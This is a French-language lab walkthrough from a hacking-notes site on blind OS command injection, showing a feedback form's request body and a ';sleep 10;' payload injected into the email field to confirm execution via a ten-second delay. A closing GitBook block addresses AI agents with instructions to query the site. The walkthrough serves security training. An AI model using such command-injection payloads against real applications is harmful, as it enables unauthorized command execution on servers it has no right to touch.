> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/fr/web/command-injection/blind-command-injection-with-time-delay.md).

# Injection de commandes aveugle avec délai temporel

### Injection de commandes OS aveugle avec redirection de sortie

Ce laboratoire présente une vulnérabilité d’injection de commandes système dans la fonctionnalité de retour d’information. / L’application exécute une commande shell construite à partir des données fournies par l’utilisateur. La sortie de cette commande \*\*n’apparaît pas dans la réponse HTTP\*\*, ce qui en fait une injection aveugle. / L’objectif est d’exploiter cette faille pour provoquer un délai de 10 secondes\*\*.

#### **Analyse du formulaire**

La page Soumettre un retour d’information envoie les données suivantes :

<figure><img src="/files/f0e6e2a121a464e1bfb301abf0de16c28d4a89bc" alt=""><figcaption></figcaption></figure>

{% code overflow="wrap" %}

```bash
csrf=3dBtfZovWVNJXDv2aXCkmfAOSH9tQt7h&name=hello&email=hello%40gmail.com&subject=hello&message=hello1234
```

{% endcode %}

Comme plusieurs champs sont transmis, l’injection consiste à \*\*ajouter un point-virgule avant et après la commande\*\*, afin qu’elle soit interprétée séparément par le shell.

Exemple de charge utile pour générer un délai :

```bash
;sleep 10;
```

#### **Champ injectable**

Le **email** le champ réagit à l’injection : la réponse prend en réalité **10 secondes**, preuve que la commande est exécutée.

Exemple de requête modifiée :

{% code overflow="wrap" %}

```bash
csrf=3dBtfZovWVNJXDv2aXCkmfAOSH9tQt7h&name=hello&email=hello%40gmail.com;sleep 10 ;&subject=hello&message=hello1234
```

{% endcode %}


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/fr/web/command-injection/blind-command-injection-with-time-delay.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
